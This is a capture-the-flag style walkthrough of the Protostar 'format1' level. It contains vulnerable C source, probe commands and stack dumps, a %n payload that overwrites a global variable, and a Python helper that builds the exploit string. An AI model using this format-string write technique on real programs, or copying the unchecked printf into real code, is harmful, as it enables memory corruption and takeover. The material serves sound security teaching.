format1
This level shows how format strings can be used to modify arbitrary memory locations.
Hints: objdump -t is your friend, and your input string lies far up the stack :) (you can use objdump -t to find all symbols from the binary)
First of all, this is an information leak: every %x makes printf pull another word off the stack and print it, so you can read whatever happens to sit there (saved registers, return addresses, pointers into libc, your own input). Imagine a program built with ASLR, meaning the stack lives at a random address; you don't know where it is, but you need that address for a buffer overflow to jump to your shellcode. A format string bug hands you values straight out of process memory, more specifically the stack, and it does so without crashing the process.
$ ./format1 "%x %x %x %x"
804960c bffff6d8 8048469 b7fd8304
$ ./format1 "`python -c 'print("%x "*20)'`"
804960c bffff6a8 8048469 b7fd8304 b7fd7ff4 bffff6a8 8048435 bffff890 b7ff1040 804845b b7fd7ff4 8048450 0 bffff728 b7eadc76 2 bffff754 bffff760 b7fe1848 bffff710
source code:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;    /* lives in .bss, zero-initialised, so only a write can make the check pass */

void vuln(char *string)
{
    /* user input used directly as the format string: this is the bug.
       printf("%s", string) would be the fix. */
    printf(string);

    if(target) {
        printf("you have modified the target :)\n");
    }
}

int main(int argc, char **argv)
{
    vuln(argv[1]);
}
get the address of target:
$ objdump -t ./format1 | grep target
08049638 g O .bss 00000004 target
Build a probe: AAAA as a marker, the address of target as little-endian bytes, nine B's of padding so that the marker lands on a 4-byte boundary (the argv strings sit at the top of the stack and their alignment depends on the total length, so this count may need tweaking on another box), and then enough "%x " to walk up the stack until the marker comes out. 137 conversions get there, and the word printed right after 41414141 is the address we planted:
$ ./format1 "`python -c 'print("AAAA" + "\x38\x96\x04\x08" + "BBBBBBBBB" + "%x "*137)'`"
AAAA8BBBBBBBBB804960c bffff538 8048469 b7fd8304 b7fd7ff4 bffff538 8048435 bffff720 b7ff1040 804845b b7fd7ff4 8048450 0 bffff5b8 b7eadc76 2 bffff5e4 bffff5f0 b7fe1848 bffff5a0 ffffffff b7ffeff4 804824d 1 bffff5a0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff5b8 94293f61 be7bc971 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff5e4 8048450 8048440 b7ff1040 bffff5dc b7fff8f8 2 bffff716 bffff720 0 bffff8cd bffff8e2 bffff8f9 bffff911 bffff91f bffff933 bffff957 bffff96e bffff981 bffff98b bffffe7b bffffe94 bffffed2 bffffee6 bfffff04 bfffff1b bfffff2c bfffff47 bfffff4f bfffff5f bfffff6c bfffffa4 bfffffb8 bfffffcc bfffffd8 0 20 b7fe2414 21 b7fe2000 10 f8bfbff 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff6fb 1f bffffff2 f bffff70b 0 0 b1000000 dffb6907 530f35e1 b99af379 699d7479 363836 0 2f2e0000 6d726f66 317461 41414141 8049638
Now swap the 137th conversion, the one that reads our planted address, for %n: printf treats that word as an int pointer and stores the number of bytes written so far through it:
$ ./format1 "`python -c 'print("AAAA" + "\x38\x96\x04\x08" + "BBBBBBBBB" + "%x "*136 + "%n ")'`"
AAAA8BBBBBBBBB804960c bffff538 8048469 b7fd8304 b7fd7ff4 bffff538 8048435 bffff720 b7ff1040 804845b b7fd7ff4 8048450 0 bffff5b8 b7eadc76 2 bffff5e4 bffff5f0 b7fe1848 bffff5a0 ffffffff b7ffeff4 804824d 1 bffff5a0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff5b8 eb6e6312 c13c9502 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff5e4 8048450 8048440 b7ff1040 bffff5dc b7fff8f8 2 bffff716 bffff720 0 bffff8cd bffff8e2 bffff8f9 bffff911 bffff91f bffff933 bffff957 bffff96e bffff981 bffff98b bffffe7b bffffe94 bffffed2 bffffee6 bfffff04 bfffff1b bfffff2c bfffff47 bfffff4f bfffff5f bfffff6c bfffffa4 bfffffb8 bfffffcc bfffffd8 0 20 b7fe2414 21 b7fe2000 10 f8bfbff 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff6fb 1f bffffff2 f bffff70b 0 0 b000000 71214f20 85368a42 13ebb60d 6998cac7 363836 0 2f2e0000 6d726f66 317461 41414141 you have modified the target :)
and pwned... target now holds the byte count printf had produced when it reached the %n (the echoed prefix plus 136 hex words), which is nonzero, and that is all the if(target) check needs.
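The counting done by eye above (find 41414141 in the dump, note that the next word is the target address, put %n at that position) is the part that changes from box to box, so here it is as a small script. This is an added example, not code from the level or from exploit-exercises; it embeds the 137-word probe output from the run above as its input, and the marker, padding and target address are the same ones used on this page. The offset and padding are assumptions about this particular stack layout: on a different machine re-run the probe and let find_offset recompute them.

```python
import struct

# Probe output copied from the 137 x "%x " run above (the page's own data, not
# constructed). printf echoed the raw little-endian address bytes right after
# "AAAA"; only the printable one ('8' == 0x38) survived in the captured text.
PROBE_OUTPUT = (
    "AAAA8BBBBBBBBB804960c bffff538 8048469 b7fd8304 b7fd7ff4 bffff538 8048435 bffff720 "
    "b7ff1040 804845b b7fd7ff4 8048450 0 bffff5b8 b7eadc76 2 bffff5e4 bffff5f0 "
    "b7fe1848 bffff5a0 ffffffff b7ffeff4 804824d 1 bffff5a0 b7ff0626 b7fffab0 "
    "b7fe1b28 b7fd7ff4 0 0 bffff5b8 94293f61 be7bc971 0 0 0 2 8048340 0 "
    "b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff5e4 8048450 "
    "8048440 b7ff1040 bffff5dc b7fff8f8 2 bffff716 bffff720 0 bffff8cd bffff8e2 "
    "bffff8f9 bffff911 bffff91f bffff933 bffff957 bffff96e bffff981 bffff98b "
    "bffffe7b bffffe94 bffffed2 bffffee6 bfffff04 bfffff1b bfffff2c bfffff47 "
    "bfffff4f bfffff5f bfffff6c bfffffa4 bfffffb8 bfffffcc bfffffd8 0 20 b7fe2414 "
    "21 b7fe2000 10 f8bfbff 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 "
    "8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff6fb 1f bffffff2 f bffff70b 0 0 "
    "b1000000 dffb6907 530f35e1 b99af379 699d7479 363836 0 2f2e0000 6d726f66 "
    "317461 41414141 8049638"
)

TARGET = 0x08049638   # address of `target` from objdump -t (page value)
MARKER = b"AAAA"      # shows up in the dump as 41414141
PAD = b"B" * 9        # keeps MARKER + address 4-byte aligned in argv; assumed for
                      # this stack layout, adjust if the marker comes out split


def build_probe(n_words, target=TARGET, pad=PAD):
    """argv[1] that echoes MARKER, the target address, then n_words stack words."""
    return MARKER + struct.pack("<I", target) + pad + b"%x " * n_words


def build_exploit(offset, target=TARGET, pad=PAD):
    """Same layout as the probe, but conversion number `offset` is %n, so printf
    stores the byte count written so far into the word it reads there: *target."""
    return MARKER + struct.pack("<I", target) + pad + b"%x " * (offset - 1) + b"%n "


def parse_dump(output, pad=PAD):
    """Return the hex words printf printed, dropping the echoed prefix."""
    tail = output.split(pad.decode(), 1)[1]
    return tail.split()


def find_offset(output, pad=PAD):
    """Locate MARKER in the dump. Returns (offset, word): `offset` is the 1-based
    conversion that reads the word right after the marker (the address we
    planted, where %n must go) and `word` is that address as printf printed it.
    Raises ValueError if the marker is not in the dump: probe with more words."""
    words = parse_dump(output, pad)
    marker_word = format(struct.unpack("<I", MARKER)[0], "x")   # "41414141"
    idx = words.index(marker_word)       # 0-based conversion that hit MARKER
    return idx + 2, words[idx + 1]


if __name__ == "__main__":
    offset, word = find_offset(PROBE_OUTPUT)
    assert int(word, 16) == TARGET, "marker found but target address does not follow it"
    print("marker at conversion %d, address word at %d (%s)" % (offset - 1, offset, word))
    print("exploit argv[1]:", build_exploit(offset))
```

The sanity check that the word after 41414141 really is the target address is worth keeping: if the padding is off by a byte or two the marker is still found, but the address bytes get split across two words and %n would dereference garbage instead of &target.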